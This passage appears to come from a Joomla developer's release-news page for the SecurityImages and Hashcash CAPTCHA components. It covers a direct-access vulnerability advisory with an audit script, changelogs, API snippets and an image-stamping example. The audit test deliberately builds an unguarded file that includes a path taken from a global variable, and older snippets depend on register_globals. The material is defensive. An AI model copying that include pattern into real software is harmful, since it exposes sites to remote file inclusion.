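        if ($statement === '' && is_array($token) && in_array($token[0], $preamble, true)) {
            continue;                       // still before the first statement
        }
        $statement .= is_array($token) ? $token[1] : $token;
        if ($token === ';') {
            break;                          // first statement fully collected
        }
    }
    $guard = '/^defined\s*\(\s*[\'"]_VALID_MOS[\'"]\s*\)\s*(or|\|\|)\s*die\s*\(/i';
    return preg_match($guard, $statement) === 1;
}

/** Return the relative paths of all *.php files under $dir lacking the guard. */
function findUnguardedPhpFiles(string $dir): array
{
    $dir = rtrim($dir, '/');
    $unguarded = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($files as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        if (!hasValidMosGuard((string) file_get_contents($file->getPathname()))) {
            $unguarded[] = substr($file->getPathname(), strlen($dir) + 1);
        }
    }
    sort($unguarded);
    return $unguarded;
}

// Constructed sample extension: one file guarded as the fix requires, one not.
$root = sys_get_temp_dir() . '/com_example_audit_' . getmypid();
mkdir($root . '/patches', 0700, true);
file_put_contents($root . '/server.php',
    "<?php\n// fixed file\ndefined('_VALID_MOS') or die('Direct Access to this location is not allowed.');\n"
    . "echo 'served';\n");
file_put_contents($root . '/configinsert.php',
    "<?php\nglobal \$mosConfig_absolute_path;\n"
    . "require_once(\$mosConfig_absolute_path . '/includes/lang.php');\n");
file_put_contents($root . '/patches/index.html', "<html><body></body></html>\n");

print_r(findUnguardedPhpFiles($root));      // lists the files still missing the guard

// Remove the sample files again.
foreach (['/configinsert.php', '/server.php', '/patches/index.html'] as $f) {
    unlink($root . $f);
}
rmdir($root . '/patches');
rmdir($root);
```

    Run it against the real component directory instead of the constructed one to confirm that all four files named above carry the guard after patching.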

    Please also contact all your friends who are using SecurityImages!

    And for my other components?

    Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is available!

    - upgrade to 1.2.2 (download at Joomla Forge or in my download section) OR
    - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

    JoomlaCloud is NOT affected

    YOU ARE ALL URGE TO UPGRADE ASAP!

  • release soon

    • Depending on settings in the admin panel, the logic was reversed for "Display or not the reload button" and "Display or not the sound button (function not implemented)"
    • Removed the "image content-type" setting, it is not needed -> a select box with gif, jpg, png output possibilities is provided instead
    • Logs are now database based, with a query engine to search for a specific spam attempt.
    • Logs can be exported to CSV, HTML, XML
    • Better localization in the admin panel, more keys in english.php
    • Added a /manuals directory with a manual on how to install securityimages in login and registration
    • A file selector (can be reused, GPL) for selecting the background pictures to be used
    • More backgrounds
    • New language file brazilian_portuguese.php courtesy of Fernando B. (http://developer.joomla.org/sf/global/do/viewUser/ferjoom )
  • Has been released at Joomla Forge, see details here

    • New: A new About page
    • New: A new developer page for people wanting to use this framework
    • New: a new troubleshooting page
  •  Maintenance releases
    • BUG: captcha combo box is now Joomla/Mambo CSS aware (class="inputbox")
    • BUG: assigning the array of fonts was not working and led to a corrupt array in plugin core 1.1
    • BUG: HNCAPTCHA O, o, I, i and 1 impossible to read...
      This is not due to the random text generator but to one font, rubberst.ttf; get rid of it in
      the "hncaptcha core admin panel". Remember: the more fonts, the more difficult it is to hack with OCR robots.
    • NEW: add Czech translation


  • One way to crack a CAPTCHA is to offer a free porn site which requires that the user key in the solution to a captcha -- which has been inlined from my site, for example -- before he can gain access. Free porn images or videos attract a lot of users around the clock and in many countries.
    SecurityImages 3.0.5 tries to solve this issue by adding text to the generated picture.

    • NEW: Hncaptcha 1.0 has been modified
    • NEW: Core 1.1 has been modified
    Download it at Joomla Forge or in my download section
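    One way to do what 3.0.5 describes, added here as an illustration and not the component's own code: stamp the name of the site that generated the image into a corner of it, so a copy relayed to an unrelated page visibly names its origin. It assumes the GD extension; the site name and the challenge text in the demo are constructed placeholders.

```php
<?php
// Added example, not the SecurityImages 3.0.5 implementation: stamp the
// serving site's name onto a CAPTCHA image so that a copy relayed to another
// site (a "solve this to see free content" page) shows where it came from.
// Requires the GD extension. $siteName and the placement are assumptions.

function stampCaptchaOrigin($image, $siteName) {
    $font   = 2;                          // built-in GD bitmap font
    $margin = 2;
    $width  = imagesx($image);
    $height = imagesy($image);
    $textW  = imagefontwidth($font) * strlen($siteName);
    $textH  = imagefontheight($font);
    // Bottom-right corner, clipped to the image so a long name is never
    // pushed off the edge (it would then be cut off and useless).
    $x = max($margin, $width - $textW - $margin);
    $y = max($margin, $height - $textH - $margin);
    // Semi-transparent light band behind the text keeps it legible on any
    // background colour or picture.
    $band = imagecolorallocatealpha($image, 255, 255, 255, 60);
    imagefilledrectangle($image, $x - $margin, $y - $margin,
                         $x + $textW + $margin, $y + $textH + $margin, $band);
    $ink = imagecolorallocate($image, 0, 0, 0);
    imagestring($image, $font, $x, $y, $siteName, $ink);
    return $image;
}

// Constructed demo: a plain 120x40 captcha carrying the challenge "k7Qp3",
// stamped with a placeholder site name and written out as PNG.
$img = imagecreatetruecolor(120, 40);
imagefill($img, 0, 0, imagecolorallocate($img, 220, 230, 240));
imagestring($img, 5, 15, 10, 'k7Qp3', imagecolorallocate($img, 30, 30, 120));
stampCaptchaOrigin($img, 'captcha.example.org');
header('Content-Type: image/png');
imagepng($img);
imagedestroy($img);
```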



  • I am back online... my notebook crashed last week and was promptly replaced by Hewlett Packard, and the new hard disk died one day after being renewed... and as usual, a lot of backups (PowerQuest V2i Protector), but I was not able to restore them, as it seems that my disk had been silently dying for weeks, and "check backup afterward for consistency" is not checked by default. I worked 3 hours on securityimages yesterday, and tested it with a new secure PHP4 installation.

    OpenComment is also currently being tested; I am removing unneeded functionality (not fully developed or tested), and as soon as it works I will deploy it to http://demo.waltercedric.com. I hope to be able to use it here on my homepage before the end of next week... So all beta testers are welcome (Colin :-))

    Click read more to see what has changed in securityimages 4.0.0





    Securityimages 4.0.0 release "Enhanced Security"

    This version is now running with:
    • PHP.ini safe mode OFF
    • Joomla RG Global Emulation Off
    • PHP.ini register globals = Off
    In the future I will also only develop with these PHP settings, which will mean more security for all users and hosts running my code.

    Bugs solved:
    artf4021: php safe mode & com_securityimages
    artf1411: Save settings button changes if config.securityimages.php is not writable
    artf4989: register_globals Off patch
    artf3206: com_contact
    artf2777: No text displayed in security Image  

    API changes
    Will work only with new releases of akocomment, akobook, etc.

    securityimages < 4.0.0
    in the PHP <form>

    <?php include ($mosConfig_absolute_path.'/administrator/components/com_securityimages/client.php'); ?>
    <?php echo insertSecurityImage("security_refid"); ?>
    <?php echo getSecurityImageText("security_try"); ?>
    <?php echo getSecurityImageTextHeader(); ?>
    <?php echo getSecurityImageTextHelp(); ?>
    <?php echo getSecurityImageField("security_try"); ?>

    The code above inserts the image and the text. Your page normally submits the information to the server for processing. Most of the time, the last 2 lines are inserted in a <form>.

    in the PHP code checking the <form>

    include ($mosConfig_absolute_path.'/administrator/components/com_securityimages/server.php');

    // $security_refid and $security_try are the submitted form fields
    // (this version relied on register_globals to populate them)
    $checkSecurity = checkSecurityImage($security_refid, $security_try);

    if ($checkSecurity === true) {
        // the user has entered the right text
    }



    securityimages >= 4.0.0: introducing a captcha hidden field visibility name (the package name)

    in the PHP <form>

    include($mosConfig_absolute_path.'/administrator/components/com_securityimages/client.php');
    $packageName = 'securityimage_newpass';
    echo "<tr><td>".getSecurityImageTextHeader()." *</td><td>".insertSecurityImage($packageName)."<br/>".getSecurityImageTextHelp().getSecurityImageField($packageName)."</td></tr>";

    in the PHP code checking the <form>

    // the three submitted fields are named after the package name
    $securityimage_newpass_refid  = mosGetParam( $_POST, 'securityimage_newpass_refid', '' );
    $securityimage_newpass_try    = mosGetParam( $_POST, 'securityimage_newpass_try', '' );
    $securityimage_newpass_reload = mosGetParam( $_POST, 'securityimage_newpass_reload', '' );
    include_once ($mosConfig_absolute_path.'/administrator/components/com_securityimages/server.php');
    // true when the user entered the right text (initialise $checkSecurity to true
    // first if you prefer to combine several checks with &=)
    $checkSecurity = checkSecurityImage($securityimage_newpass_refid, $securityimage_newpass_try, $securityimage_newpass_reload);


    New!
    HNCAPTCHA: now color background is fully configurable








  • Use only this version, it replaces the buggy release 4.0.0. It has all the promises of the 4.0.0, with fewer bugs :-)



    Note, you will have to download the component com_securityimages4.0.1.zip AND replace the Joomla! core files with the patch JoomlaPatches1.0.11-v1.0.2.zip

    Files are in my download section.
     
  • BUG: links to downloadable Joomla patches changed from Joomla Forge to www.waltercedric.com
    NEW: a new plugin watercap
    NEW: possibility to remove the backlink to this site in the admin panel.
    BUG: akocomment switch for activating securityimages was the same as the akobook switch

    The following has been done to resolve common support issues in the forum.
    NEW: better detection of the GD library and warnings if it is not detected during installation
    NEW: error message if GD is not detected, instead of a broken image at runtime.

    Thanks to Lukas Wymann
    BUG: "Switch component OFF globally" and "Switch component to debug" switches were exchanged
    BUG: constant $copyright not initialized in 2 places, $refreshlink not created
    BUG: missing file calculator.jpg in installer

    To be released in a few hours

    Do not forget that the GD library is required, 90% of forum entries are related to this issue.

    GD is an open source code library for the dynamic creation of images by programmers. GD creates PNG, JPEG and GIF images, among other formats. GD is commonly used to generate charts, graphics, thumbnails, and most anything else, on the fly. While not restricted to use on the web, the most common applications of GD involve web site development. (from http://www.libgd.org/)

    How to install GD
    SecurityImages manual
  • Visit my download section to grab the latest version of securityimages 4.2.1

    NEW/BUG: Better compatibility of session handling with SMF Bridge/FacileForms
    NEW: Dutch translations courtesy of Henk von Pickartz, aka Boswachter - http://boswachter.free.fr
    BUG: links to downloadable Joomla patches changed from Joomla Forge to www.waltercedric.com
    NEW: a new plugin watercap
    NEW: possibility to remove the backlink to this site in the admin panel.
    BUG: akocomment switch for activating securityimages was the same as the akobook switch

    The following has been done to resolve common support issues in the forum.
    NEW: better detection of the GD library and warnings if it is not detected during installation
    NEW: error message if GD is not detected, instead of a broken image at runtime.

    Thanks to Lukas Wymann
    BUG: "Switch component OFF globally" and "Switch component to debug" switches were exchanged
    BUG: constant $copyright not initialized in 2 places, $refreshlink not created
    BUG: missing file calculator.jpg in installer
  • Thanks to jaylenong in my forums, a security concern in securityimages 4.2.1 has been found and corrected.

    It is recommended to use SecurityImages 4.2.2, download it HERE